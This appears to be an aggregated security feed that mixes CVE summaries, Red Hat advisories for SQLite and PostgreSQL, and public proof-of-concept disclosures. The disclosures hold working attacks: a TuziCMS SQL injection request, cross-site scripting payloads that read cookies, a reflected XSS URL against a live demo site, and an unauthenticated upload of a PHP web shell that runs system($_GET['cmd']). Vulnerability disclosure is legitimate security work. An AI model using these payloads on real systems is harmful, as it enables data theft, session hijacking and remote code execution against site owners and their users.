A vulnerability was found in aeharding classroom-engagement-system and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to sql injection. The attack may be launched remotely. The name of the patch is 096de5815c7b414e7339f3439522a446098fb73a. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218156.

CVE-2013-10011

Red Hat Security Advisory 2023-0110-01 - SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: sqlite security update  
Advisory ID:       RHSA-2023:0110-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0110  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-35737   
=====================================================================

1. Summary:

An update for sqlite is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

SQLite is a C library that implements an SQL database engine. A large  
subset of SQL92 is supported. A complete database is stored in a single  
disk file. The API is designed for convenience and ease of use.  
Applications that link against SQLite can enjoy the power and flexibility  
of an SQL database without the administrative hassles of supporting a  
separate database server.

Security Fix(es):

* sqlite: an array-bounds overflow if billions of bytes are used in a  
string argument to a C API (CVE-2022-35737)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110291 - CVE-2022-35737 sqlite: an array-bounds overflow if billions of bytes are used in a string argument to a C API

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
lemon-3.26.0-17.el8_7.aarch64.rpm  
lemon-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.aarch64.rpm

ppc64le:  
lemon-3.26.0-17.el8_7.ppc64le.rpm  
lemon-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debugsource-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.ppc64le.rpm

s390x:  
lemon-3.26.0-17.el8_7.s390x.rpm  
lemon-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debugsource-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.s390x.rpm

x86_64:  
lemon-3.26.0-17.el8_7.x86_64.rpm  
lemon-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
sqlite-3.26.0-17.el8_7.src.rpm

aarch64:  
lemon-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-3.26.0-17.el8_7.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.aarch64.rpm  
sqlite-devel-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-3.26.0-17.el8_7.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.aarch64.rpm

noarch:  
sqlite-doc-3.26.0-17.el8_7.noarch.rpm

ppc64le:  
lemon-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-debugsource-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-devel-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.ppc64le.rpm

s390x:  
lemon-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-3.26.0-17.el8_7.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-debugsource-3.26.0-17.el8_7.s390x.rpm  
sqlite-devel-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-3.26.0-17.el8_7.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.s390x.rpm

x86_64:  
lemon-debuginfo-3.26.0-17.el8_7.i686.rpm  
lemon-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-3.26.0-17.el8_7.i686.rpm  
sqlite-3.26.0-17.el8_7.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-analyzer-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-debugsource-3.26.0-17.el8_7.i686.rpm  
sqlite-debugsource-3.26.0-17.el8_7.x86_64.rpm  
sqlite-devel-3.26.0-17.el8_7.i686.rpm  
sqlite-devel-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-3.26.0-17.el8_7.i686.rpm  
sqlite-libs-3.26.0-17.el8_7.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-libs-debuginfo-3.26.0-17.el8_7.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.i686.rpm  
sqlite-tcl-debuginfo-3.26.0-17.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i/9zjgjWX9erEAQhB3xAAjjssNOL1S2J0s5hcPZWxpjsGF88e97GR  
pn7k5YE7r1ICInJpHxB3AzHNYDI7gEGXBh+NvmZVOma9DflYRutXrjTuRnQbisxa  
PODEMyaeWbFATQnb2jZ057im74yvJCLwceH0BfV1WchiYQS5qZsErS1ZCtnkj+rz  
RNd1Og307yRJzYjnHeeNxYvHIAsRkuDER06wS9fkQjeOOSNJOoyro0ZG/NLbrDln  
ykSsV8CQGTVkoxz4OLgN+LSe65J6xX8oTRy9EjVS8u61CEnj61B3hOCWkZVj7dTt  
qevHQ2eqGaJQMpdkFaKdMkK7oJDMcB7u581zd73ekvpO9CQnWLa9BX+nJR5qTFRR  
hGXtMz9j+buqIhqeDD3JAAD/sH21D41tmkIQ4LgyixcA139jCXGfNcWyezi5GRBy  
eaehaiWoSyRt33RnspNL6nLNbDCsYsgHUlwaTaNfaoOGe0XwZ/B2PFD4TnLBhxb1  
HqtBsM9/AFPDGZguvwsu2pRJ3TiP9kYzW0Kb2t+0I5qiq9jS5nKboab68TDQRYr/  
zIR7jaC23uVW6/RRMCyIxbm+4ui7XEEsiskj/f22O9XHEr1NlWHQTTChQSXwgTQ9  
+LPsKHAhaTBh4puPBUNkdXoIrS7in9qwyabmmkOuMBN9hdf1WwM2uzPuSKHmo/Ny  
MFJ2qbkASWI=  
=kL2f  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0110-01

A vulnerability, which was classified as critical, has been found in SourceCodester Online Flight Booking Management System. This issue affects some unknown processing of the file add_contestant.php. The manipulation of the argument add_contestant leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-218153 was assigned to this vulnerability.

CVE-2023-0245

A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218152.

line: 157 - 196  
\` public function delall(){  
//dump($\_POST);  
//exit;  
$m=D('Advert'); //数据库表，配置文件中定义了表前缀，这里则不需要写  
$id = I('post.id');  
//dump($id);  
//exit;  
if ($id==null){  
$this->error('请选择删除项！');  
}  
//判断id是数组还是一个数值  
if(is\_array($id)){  
$where = 'id in('.implode(',',$id).')';  
//implode() 函数返回一个由数组元素组合成的字符串  
}else{  
$where = 'id='.$id;  
}  
//dump($where);  
//exit;

    	$m=M('Advert');
    	$arr=$m->where($where)->select();
    	
    	foreach ($arr as $key => $value){
    		$images=$value['advert_image'];
    		//dump($images);
    		//exit;
    		unlink('./Uploads/'.$images);
    	}
    	
    	$count=$m->where($where)->delete(); //修改表单用save函数
    	if ($count>0){
    		$this->success("成功删除{$count}条！");
    	}
    	else {
    		$this->error('批量删除失败！');
    	}
    
    }
    `
    

Because the security syntax of thinkphp framework is not used here, and $id is used to splice the $where variable for query, resulting in a serious SQL injection vulnerability. May cause serious harm to the system.

  

poc:  
\`POST /index.php/manage/kefu/delall HTTP/1.1  
Host: www.tuzi.com  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2  
x-forwarded-for: 8.8.8.8  
x-originating-ip: 8.8.8.8  
x-remote-ip: 8.8.8.8  
x-remote-addr: 8.8.8.8  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 73

id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/\*\*/user()),0x7e)))

\`

CVE-2023-0244: \App\Manage\Controller\KefuController.class.php has SQLinject · Issue #13 · yeyinshi/tuzicms

A vulnerability classified as critical has been found in TuziCMS 2.0.6. This affects the function index of the file App\Manage\Controller\ArticleController.class.php of the component Article Module. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-218151.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-0243: App\Manage\Controller\ArticleController.class.php has SQLinject · Issue #12 · yeyinshi/tuzicms

A cross-site scripting (XSS) vulnerability in the component /admin/register.php of Online Student Enrollment System v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter.

Permalink

Cannot retrieve contributors at this time

**Online Student Enrollment System v1.0 by donbermoy has Cross-site scripting**

BUG\_Author: mkwsj007

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/register.php

POST parameter 'name' exists Cross-site scripting vulnerability

Payload1: a"><script>alert(1)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 797
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMkbv5jtnvqBtc9PG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(1)</script>b
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryMkbv5jtnvqBtc9PG--
    

Payload2: a"><script>alert(document.cookie)</script>b

    POST /student_enrollment/admin/register.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 811
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryo4AaLx6Ali4mxyDj
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/student_enrollment/admin/register.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=j9loi161fde5rq6oo1jkuelrcn
    Connection: close
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="name"
    
    a"><script>alert(document.cookie)</script>b
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="email"
    
    c@gmail.com
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="username"
    
    d
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="c_password"
    
    e
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="photo"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj
    Content-Disposition: form-data; name="register"
    
    
    ------WebKitFormBoundaryo4AaLx6Ali4mxyDj--

CVE-2022-46503: bug_report/XSS-1.md at main · mkwsj007/bug_report

eCart Web version 5.0.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : ecartmultivendorweb.thewrteam.in                                           ││  Vendor   : By WRTEAM Ekart.Com                                                        ││  Software : eCart Web 5.0.0 - Multi Vendor eCommerce Marketplace                       ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'category' is vulnerable to XSSPath: /shophttps://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1[-] Done

eCart Web 5.0.0 Cross Site Scripting

Online Food Ordering System version 2.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 01/11/2023  
# Exploit Author: Onurcan Alcan  
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code  
# Version: 2.0   
# Tested on: Macos / XAMPP

############## Unauthenticated File Upload Request ##############

POST /fos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38679779537855109463517942658  
Content-Length: 1225  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/fos/admin/index.php?page=menu  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="id"

1  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="name"

Diet Coke  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="description"

In Can  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="status"

on  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="category_id"

3  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="price"

20  
-----------------------------38679779537855109463517942658  
Content-Disposition: form-data; name="img"; filename="revcmd.php"  
Content-Type: text/php

<?  
?>  
<HTML><BODY>  
<FORM METHOD="GET" NAME="myform" ACTION="">  
<INPUT TYPE="text" NAME="cmd">  
<INPUT TYPE="submit" VALUE="Send">  
</FORM>  
<pre>  
<?  
if($_GET['cmd']) {  
  system($_GET['cmd']);  
  }  
?>  
</pre>  
</BODY></HTML>

-----------------------------38679779537855109463517942658--

Online Food Ordering System 2.0 Shell Upload

Red Hat Security Advisory 2023-0113-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:0113-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0113  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2625   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Extension scripts replace objects not belonging to the  
extension. (CVE-2022-2625)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2113825 - CVE-2022-2625 postgresql: Extension scripts replace objects not belonging to the extension.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.src.rpm

aarch64:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.aarch64.rpm

ppc64le:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.ppc64le.rpm

s390x:  
postgresql-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-contrib-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-debugsource-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-docs-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plperl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-static-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-test-rpm-macros-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
postgresql-upgrade-devel-10.23-1.module+el8.7.0+17280+3a452e1f.s390x.rpm  
